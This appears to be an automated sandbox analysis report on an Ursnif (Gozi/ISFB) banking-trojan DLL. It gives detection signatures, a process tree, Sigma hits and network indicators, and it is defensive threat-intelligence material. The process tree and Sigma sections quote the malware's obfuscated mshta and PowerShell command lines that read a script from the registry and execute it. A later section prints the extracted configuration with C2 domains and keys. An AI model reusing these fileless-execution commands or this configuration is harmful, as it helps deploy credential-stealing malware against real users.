
Windows Analysis Report 6.png

Overview

General Information

Sample Name: 6.png (renamed file extension from png to dll)
Analysis ID: 539457
MD5: ac57d694b86d8532b38d3d62f6de3afc
SHA1: c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256: fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags: dll, exe, geofenced, Gozi, isfb, ITA, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

            Sigma Overview

            System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
Sigma detected: Suspicious Rundll32 Activity
Source: Process started, Author: juju4, Jonhnathan Ribeiro, oscd.community, Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

            Jbx Signature Overview


            AV Detection:

Found malware configuration
Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 6.dll, Joe Sandbox ML: detected
Source: 6.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

            Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 3.12.124.139 187
Source: Joe Sandbox View, ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: 6.dll | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 6.dll | String found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: 6.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: 6.dll | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: 6.dll | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: 6.dll | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: 6.dll | String found in binary or memory: http://ocsp.digicert.com0C
            Source: 6.dll | String found in binary or memory: http://ocsp.digicert.com0N
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: 6.dll | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
            Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
            Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp | String found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
            Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/
            Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/BS
            Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp | String found in binary or memory: https://berukoneru.website/LAp
